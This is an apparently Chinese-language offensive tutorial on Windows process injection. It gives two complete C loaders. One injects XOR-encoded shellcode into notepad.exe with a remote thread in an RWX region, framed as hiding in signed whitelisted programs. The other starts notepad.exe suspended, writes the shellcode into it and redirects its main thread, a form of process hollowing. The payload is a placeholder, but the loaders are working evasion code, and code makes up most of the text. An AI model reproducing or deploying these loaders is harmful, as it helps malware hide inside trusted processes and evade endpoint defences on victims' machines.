
进程注入_AND_ProcessHollowing

远线程注入

注入到带有签名的白名单程序中

#include <stdio.h>
#include <windows.h>
#include <TlHelp32.h>
/* XOR-encoded payload. The literal here is only a placeholder standing in for
 * the real bytes. It is decoded in place by the XOR loop in InjectShellCode(),
 * and because it is initialised from a string literal, sizeof(buf) also counts
 * the trailing '\0'. */
unsigned char buf[] = "异或后的shellcode";

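/*
 * Find the PID of the first running process whose image name equals szName
 * (case-insensitive), using a Toolhelp32 process snapshot.
 *
 * szName: image file name such as L"notepad.exe" (no path component).
 * Returns the PID when found, 0 when no process matches, and -1 when the
 * snapshot cannot be created (an error code is printed) or enumerated.
 * Callers must check the result before passing it on: neither 0 nor -1 is a
 * usable PID for OpenProcess().
 *
 * Fixes against the previous version: the first snapshot entry is now compared
 * (it was skipped because only Process32Next results were tested), the
 * snapshot handle is closed on the Process32First failure path, the explicit
 * W entry points are used so the wchar_t comparison does not depend on the
 * UNICODE macro, and DWORD values are printed with %lu instead of %d.
 */
INT FoundPid(const wchar_t* szName) {
    PROCESSENTRY32W pe = { 0 };
    pe.dwSize = sizeof(pe);   /* Toolhelp32 rejects the call if dwSize is unset */

    HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapShot == INVALID_HANDLE_VALUE) {
        printf("[-] 进程快照创建失败!\t错误值: %lu\n", GetLastError());
        return -1;
    }

    INT pid = 0;
    if (!Process32FirstW(hSnapShot, &pe)) {
        /* Same -1 as before, but without leaking the snapshot handle. */
        CloseHandle(hSnapShot);
        return -1;
    }

    /* do/while so the entry filled in by Process32FirstW is tested as well. */
    do {
        if (_wcsicmp(szName, pe.szExeFile) == 0) {
            pid = (INT)pe.th32ProcessID;
            printf("[+] 找到指定进程pid: %lu\n", pe.th32ProcessID);
            break;
        }
    } while (Process32NextW(hSnapShot, &pe));

    CloseHandle(hSnapShot);
    return pid;
}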

/*
 * Copy the global buf[] into the first process named szName and start it on a
 * new thread in that process.
 *
 * szName: image name looked up through FoundPid() (case-insensitive).
 * Returns nothing. None of the Win32 calls below is checked, so any failure
 * is silent (see the NOTE(review) comments inline).
 *
 * Educator's note: this is the textbook remote-thread injection sequence the
 * page describes — open the target, allocate an executable region in it, write
 * into it, create a thread there. Each of those four steps is a cross-process
 * operation the OS performs on the caller's behalf, which is exactly what
 * endpoint auditing records.
 */
void InjectShellCode(const wchar_t* szName)
{
HANDLE Handle, remoteThread;
PVOID remoteBuffer;
int Pid = FoundPid(szName);
// NOTE(review): FoundPid returns 0 (not found) or -1 (snapshot error); neither
// is checked here, so OpenProcess is attempted with an invalid PID and the
// handle it returns is used without being validated.
Handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);
// Undo the XOR encoding in place. buf is a global, so this mutates it for the
// rest of the program: a second call would re-encode it. sizeof(buf) also
// counts the string literal's terminating '\0'.
// NOTE(review): `int i` against `sizeof(buf)` (size_t) is a signed/unsigned
// comparison; size_t i would be the clean form.
for (int i = 0; i < sizeof(buf); i++) {
buf[i] ^= 50;
}
// Allocate an RWX region in the target and copy buf into it. Neither the
// allocation result (NULL on failure) nor the write result is checked.
remoteBuffer = VirtualAllocEx(Handle, NULL, sizeof(buf), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
WriteProcessMemory(Handle, remoteBuffer, buf, sizeof(buf), NULL);
// Start the copied bytes as a new thread in the target.
// NOTE(review): the returned thread handle is never closed (only Handle is),
// so it leaks until this process exits.
remoteThread = CreateRemoteThread(Handle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
CloseHandle(Handle);
}


/* Entry point: run InjectShellCode against the first notepad.exe found.
 * argc/argv are accepted but not used. */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;
    InjectShellCode(L"notepad.exe");
    return 0;
}

傀儡进程 Process Hollowing

傀儡进程: 创建一个进程, 将其虚拟地址空间中的原有内容掏空, 再把想要运行的代码写入该进程, 以达到掩人耳目的效果

    1. 创建挂起进程: CreateProcess(PATH_TO_HOST_EXE, ..., CREATE_SUSPENDED, ...) 便可创建一个处于挂起状态的进程.
    2. 获取线程上下文结构: 使用 GetThreadContext() 获取主线程上下文(寄存器状态).
    3. 写入傀儡进程(申请内存空间, 写入shellcode): VirtualAllocEx() 在目标进程中分配与傀儡进程大小相同的空间, WriteProcessMemory() 向分配的空间写入傀儡进程.
    4. 恢复现场(设置上下文, 恢复线程): 由于目标进程和傀儡进程的入口点一般不同, 所以在恢复前需要更改线程入口点, 使用 SetThreadContext 函数, 最后使用 ResumeThread 函数释放运行.
#include <Windows.h>
#include <stdio.h>

/* XOR-encoded payload. The literal here is only a placeholder standing in for
 * the real bytes. It is decoded in place by the XOR loop in ReplaceProcess(),
 * and because it is initialised from a string literal, sizeof(buf) also counts
 * the trailing '\0'. */
unsigned char buf[] = "异或的shellcode";

/*
 * Start pszFilePath as a suspended host process, copy the global buf[] into a
 * freshly allocated region of that process, point the suspended main thread at
 * it and resume it. Blocks until that thread exits.
 *
 * pszFilePath: path of the host executable. It is passed as lpApplicationName
 *              with no command line, so it must be a real path (the search
 *              path is not consulted).
 * Returns TRUE once the host thread has finished; FALSE if any step fails,
 * after printing a bare step name (no newline, no error code) to stdout.
 *
 * NOTE(review): despite the "Process Hollowing" heading, this routine never
 * unmaps or overwrites the host's original image. It only allocates a new
 * region and redirects the entry point, so the host image stays mapped and
 * unchanged while the main thread is started at an address outside any
 * loaded module.
 * NOTE(review): it writes threadContext.Rip, so it only compiles for an x64
 * target (the x86 CONTEXT has Eip instead).
 * NOTE(review): every early `return FALSE` leaves pi.hProcess and pi.hThread
 * open and the suspended host process alive; a goto-cleanup tail that
 * terminates the host and closes both handles would fix all four paths.
 */
BOOL ReplaceProcess(const char *pszFilePath)
{
STARTUPINFO si = { 0 };
PROCESS_INFORMATION pi = { 0 };
CONTEXT threadContext = { 0 };
BOOL bRet = FALSE;
// The three RtlZeroMemory calls repeat what the `= { 0 }` initialisers above
// already did; harmless but redundant.
RtlZeroMemory(&si, sizeof(si));
RtlZeroMemory(&pi, sizeof(pi));
RtlZeroMemory(&threadContext, sizeof(threadContext));
si.cb = sizeof(si);

// Create the host process with its main thread suspended.
bRet = CreateProcessA(pszFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
if (FALSE == bRet)
{
printf("CreateProcess");
return FALSE;
}

// Reserve and commit an RWX region inside the host, sized to buf.
LPVOID lpDestBaseAddr = VirtualAllocEx(pi.hProcess, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (NULL == lpDestBaseAddr)
{
printf("VirtualAllocEx");
return FALSE;
}

// Undo the XOR encoding in place. buf is a global, so this is one-shot: a
// second call would re-encode it. `int i` vs size_t sizeof(buf) is a
// signed/unsigned comparison.
for (int i = 0; i < sizeof(buf); i++) {
buf[i] ^= 50;
}
// Copy the decoded bytes into the host's new region.
bRet = WriteProcessMemory(pi.hProcess, lpDestBaseAddr, buf, sizeof(buf), NULL);
if (FALSE == bRet)
{
printf("WriteProcessError");
return FALSE;
}

// Fetch the suspended main thread's register context.
// ContextFlags MUST be set before GetThreadContext; it tells the kernel which
// register groups to fill in, and an unset value yields an empty context.
threadContext.ContextFlags = CONTEXT_FULL;
bRet = GetThreadContext(pi.hThread, &threadContext);
if (FALSE == bRet)
{
printf("GetThreadContext");
return FALSE;
}


// Redirect the instruction pointer to the new region (x64 field: Rip).
threadContext.Rip = (DWORD64)lpDestBaseAddr;
// Apply the modified context back to the still-suspended thread.
bRet = SetThreadContext(pi.hThread, &threadContext);
if (FALSE == bRet)
{
printf("SetThreadContext");
return FALSE;
}
// Let the thread run, wait for it to exit, then release both handles.
// NOTE(review): ResumeThread's return value (previous suspend count, or
// (DWORD)-1 on failure) is not checked.
ResumeThread(pi.hThread);
WaitForSingleObject(pi.hThread, INFINITE);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return TRUE;
}

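/* Entry point: run buf[] inside a suspended copy of notepad.exe.
 * The original declared `void main()`, which is not a valid C signature;
 * standard C requires `int main`. ReplaceProcess's BOOL result is still
 * ignored, as before, so the exit status is always 0. */
int main(void)
{
    ReplaceProcess("C:\\Windows\\System32\\notepad.exe");
    return 0;
}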

References

- https://bbs.pediy.com/thread-224706.htm
- https://jev0n.com/2020/03/11/65.html
- https://www.cnblogs.com/bonelee/p/15957493.html
- https://juejin.cn/post/6844903587626090503#process-hollowing
- https://www.52pojie.cn/thread-501486-1-1.html
- https://github.com/m0n0ph1/Process-Hollowing
